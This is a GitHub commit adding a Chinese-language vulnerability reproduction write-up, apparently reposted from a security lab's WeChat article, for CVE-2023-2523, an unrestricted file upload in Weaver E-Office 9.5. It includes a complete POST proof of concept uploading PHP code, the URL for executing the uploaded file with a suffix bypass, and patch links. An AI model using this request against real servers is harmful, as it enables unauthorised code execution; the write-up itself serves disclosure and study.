Skip to content

Commit

Permalink
Upload new file: 泛微 E-Office 文件上传漏洞 (CVE-2023-2523).md via simpread
Browse files Browse the repository at this point in the history
  • Loading branch information
@MrWQ
MrWQ committed Aug 28, 2023
1 parent 47fb47e commit 27da222
Showing 1 changed file with 147 additions and 0 deletions.
147 changes: 147 additions & 0 deletions bugs/泛微 E-Office 文件上传漏洞 (CVE-2023-2523).md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,147 @@
> 本文由 [简悦 SimpRead](http://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/DrgEJ6E8xymVCEkvJo92WQ)


网安引领时代,弥天点亮未来





![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x00 写在前面**



**本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!**

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x01 漏洞介绍**

Weaver E-Office 是中国泛微科技(Weaver)公司的一个协同办公系统。

Weaver E-Office 9.5 版本存在代码问题漏洞,该漏洞源于 App/Ajax/ajax.php?action=mobile_upload_save 存在未知函数,通过参数 upload_quwan 导致不受限制的上传。

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x02 影响版本**



Weaver E-Office 9.5 版本

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbNVcqyB4Q5kQQSWKL8zTjAyyuKSuNXLQ6sr7CnoOPJajfcafq5TmmfA/640?wx_fmt=png)

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x03 漏洞复现**



1. 部署漏洞环境访问

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbTprmy4g99pVrgeegOk4l4WW2LHiaDdpOhyl72A5DuiaSk1PFBQzbcR2w/640?wx_fmt=png)

默认用户 admin,空密码登录

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbtiaexYe1xiaWOFbqV7fvHP55icSBFoch46gj3bGBkddD5S7BWA1YSwTvg/640?wx_fmt=png)

2. 对漏洞进行复现

**Poc (POST)**

```
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: 10.211.55.3:8082
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Content-Length: 338
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data;
Content-Type: image/jpeg
<?php phpinfo();?>
-------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data;
Content-Type: application/octet-stream
```

漏洞复现

访问路径若存在该文件,可能存在漏洞

```
http://10.211.55.3:8082/E-mobile/App/Ajax/ajax.php
```

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbIkbiaUX6j9vnia7JLHHN3JXt0rgGWibwppc3sERCnEjBgVYas2LeiaQiajQ/640?wx_fmt=png)

POST 请求,响应存在漏洞

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbJnJKyRZ4hf166Fibx2aDBsb4cbltvnba9ibr22bFhibm7XCBI7gA0Dvvg/640?wx_fmt=png)

        解析 php 文件 (**注意后缀绕过**)

```
http://10.211.55.3:8082/attachment//2856423138/888.php.
```

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hAIrqk2zMuQ25CibicZgeDYsbNAdsTX3qADj8ichrHbkXPBia46mRsfY98DJtVKGqse99Wib2mH3Qf8RBQ/640?wx_fmt=png)

3.**Getshell** 同泛微 E-Office 文件上传漏洞 (CVE-2023-2648) 操作,这里省略.......

![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)



**0x04 修复建议**



目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

```
https://service.e-office.cn/download
https://global.weaver.com.cn/website/en/eoffice.html
```

弥天简介

学海浩茫,予以风动,必降弥天之润!弥天弥天安全实验室成立于 2019 年 2 月 19 日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。

口号 网安引领时代,弥天点亮未来

![](https://mmbiz.qpic.cn/mmbiz_gif/b96CibCt70iaaqjXT4YxgHVARD1NNv0RvKtiaAvXhmruVqgavPY3stwrfvLKetGycKUfxIq3Xc6F6dhU7eb4oh2gg/640?wx_fmt=gif&wxfrom=5&wx_lazy=1) 

知识分享完了

喜欢别忘了关注我们哦~

学海浩茫,

予以风动,

必降弥天之润!

   弥  天

安全实验室

![](https://mmbiz.qpic.cn/mmbiz_jpg/MjmKb3ap0hDyTJAqicycpl7ZakwfehdOgvOqd7bOUjVTdwxpfudPLOJcLiaSZnMC7pDDdlIF4TWBWWYnD04wX7uA/640?wx_fmt=jpeg&wxfrom=5&wx_lazy=1&wx_co=1)

0 comments on commit 27da222

Please sign in to comment.